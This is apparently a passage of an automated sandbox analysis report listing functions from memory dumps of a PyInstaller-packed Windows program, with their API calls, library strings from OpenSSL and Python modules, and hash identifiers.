                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35419011A1964244EA13FB619C552B9A253FFA97E0FE00535EE0D47ADADE3CE805CF60
                                                                                                                                                                                                                                  Function 00007FF72C65EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                                                  • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                  • Instruction ID: cf1b7d9260b1dd337f322538d9dc9c3f42fb4c4a0a2055fb6799c411062e17d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05D18232A0878186EB21AB65D9803ADB7A2FB657E8F600135DF4D57795DF3CE081CB11
                                                                                                                                                                                                                                  Function 00007FF72C66ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF72C66F0AA,?,?,00000237A2949838,00007FF72C66AD53,?,?,?,00007FF72C66AC4A,?,?,?,00007FF72C665F3E), ref: 00007FF72C66EE8C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF72C66F0AA,?,?,00000237A2949838,00007FF72C66AD53,?,?,?,00007FF72C66AC4A,?,?,?,00007FF72C665F3E), ref: 00007FF72C66EE98
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                  • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                  • Instruction ID: 4bc6771c35aad53dbe7e34b14185a0abb63c90f1c0af2297e5558ee2b09d60af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8841E62171964282EA17AB569C04575B2A2FF65BB0FE84539DD1D47784EE3CE40A8A20
                                                                                                                                                                                                                                  Function 00007FFBAA496234 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 113networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Ioctl
                                                                                                                                                                                                                                  • String ID: invalid ioctl command %lu$k(kkk):ioctl$kI:ioctl$kO:ioctl
                                                                                                                                                                                                                                  • API String ID: 3041054344-4238462244
                                                                                                                                                                                                                                  • Opcode ID: 441793013725e27a22c0b2ab8fe50c6f096d6b0bae4d3890f8c4f5f827f12015
                                                                                                                                                                                                                                  • Instruction ID: 0c08d6b7f83ad4bf11768eb1f32ffa51f4d8eb1fd6171cdfc8422d81b62dc114
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 441793013725e27a22c0b2ab8fe50c6f096d6b0bae4d3890f8c4f5f827f12015
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB516AB1A19A41C9F761CB70E8C05ADB3B8FB48744F540232EE5E93A68DF38D565C760
                                                                                                                                                                                                                                  Function 00007FF72C652C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652C9E
                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652D63
                                                                                                                                                                                                                                  • MessageBoxW.USER32 ref: 00007FF72C652D99
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                  • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                  • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                  • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                  • Instruction ID: e5da6b28d70f97c550be33878bb7928a7a18930d417b19fe976bc6fb89343c7f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0731F622708A4142E721BB25AC142ABA792FF987E8F900136EF4D93759DF3CD50ACB10
                                                                                                                                                                                                                                  Function 00007FFBA6091497 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 306COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
                                                                                                                                                                                                                                  • API String ID: 0-1087561517
                                                                                                                                                                                                                                  • Opcode ID: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                  • Instruction ID: adb29aa9f74fc66a348b63e214c0a22328f0b0751bccc266b95f0a62fbc5e6db
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29D159E1F0A65351FB62AA72D5817BD12A3AF45F88F845032DD1E47BC6DE3CE5A28310
                                                                                                                                                                                                                                  Function 00007FFBA60926E4 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 256COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                                                                                  • API String ID: 0-2528746747
                                                                                                                                                                                                                                  • Opcode ID: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                  • Instruction ID: 133cd36bad89993c3b43be1cc4e53b1b9b27c529adea11a0d68ae6350e525ca0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62B15CE1E0A68295FB23EB71D8812BD2B63FB44B84F509432DD0D4BB99DE3CE6458350
                                                                                                                                                                                                                                  Function 00007FFBAA4C0718 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 107COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007
                                                                                                                                                                                                                                  • String ID: Invalid compression preset: %u$Invalid filter specifier for LZMA filter$preset$|OOO&O&O&O&O&O&O&O&
                                                                                                                                                                                                                                  • API String ID: 3568877910-1461672608
                                                                                                                                                                                                                                  • Opcode ID: 6d4f4a8982cc2adfbe601f8644f4891ef6d6d32ef4def972bcb1a41917f04399
                                                                                                                                                                                                                                  • Instruction ID: 5a68c9c2f49b5386d32b25f99d1c42c054b1ee682f069bc2d4f7c5c8601e49e2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d4f4a8982cc2adfbe601f8644f4891ef6d6d32ef4def972bcb1a41917f04399
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD511CB1A0AB42D6E7618F21E4402A977B8FF84B84F544176EE8D03B64DF3CD55AC760
                                                                                                                                                                                                                                  Function 00007FF72C65DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD4D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD5B
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD85
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DDF3
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DDFF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                  • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                  • Instruction ID: 6ae0cf5baa093417a20021ca0618aaefd6792ed2195cb2806e943f1291da9b45
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE317221B1A64291EE13BB069D006A5A3D5FF68BF4FE94635DE1D463C0EE3CE4448B24
                                                                                                                                                                                                                                  Function 00007FF72C652A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF72C65351A,?,00000000,00007FF72C653F23), ref: 00007FF72C652AA0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                  • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                  • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                  • Instruction ID: d4c003c454b633111998e97adf63469324c152fbf723e2234dec0d1069d84301
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7921A132A18B8292E722AB50BC417E6B3A5FB983D4F900136EE8D43659DF3CD149CA50
                                                                                                                                                                                                                                  Function 00007FF72C658570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 995526605-0
                                                                                                                                                                                                                                  • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                  • Instruction ID: 4e9efa4256274eaa79a19353c0f60a9e941a94e07aa51b5e515e7b0f6c095f0c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7212521A0C64241EB51AB55B94423AE3A2FFD57F4FA00235E66D43AD4DE7CD4458F10
                                                                                                                                                                                                                                  Function 00007FF72C66B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                  • Opcode ID: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
                                                                                                                                                                                                                                  • Instruction ID: 22c0e5db78f66657727efbb6fbc4989aea53d76814ed5388e91f011f0e5ee254
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC219024B0C24381F95A73619E51239F163FFA47B0FA04738E87E066C6DE2DA4405F21
                                                                                                                                                                                                                                  Function 00007FFBAA497FC8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: getservbyporthtons
                                                                                                                                                                                                                                  • String ID: getservbyport: port must be 0-65535.$i|s:getservbyport$port/proto not found$socket.getservbyport
                                                                                                                                                                                                                                  • API String ID: 3477891686-2618607128
                                                                                                                                                                                                                                  • Opcode ID: 4471399b94432fca938d6bd7da45e6e9e5440958a35927fdab7468f72b463937
                                                                                                                                                                                                                                  • Instruction ID: 014e982c961c795e16b712647bae1d47882afeb9221e759f90f647a8d1a0a021
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4471399b94432fca938d6bd7da45e6e9e5440958a35927fdab7468f72b463937
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA21F1A1A0AA03C1EA128B35E4C467D7379FB85B85F540071EE4E47679DF3ED06AC720
                                                                                                                                                                                                                                  Function 00007FF72C677D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
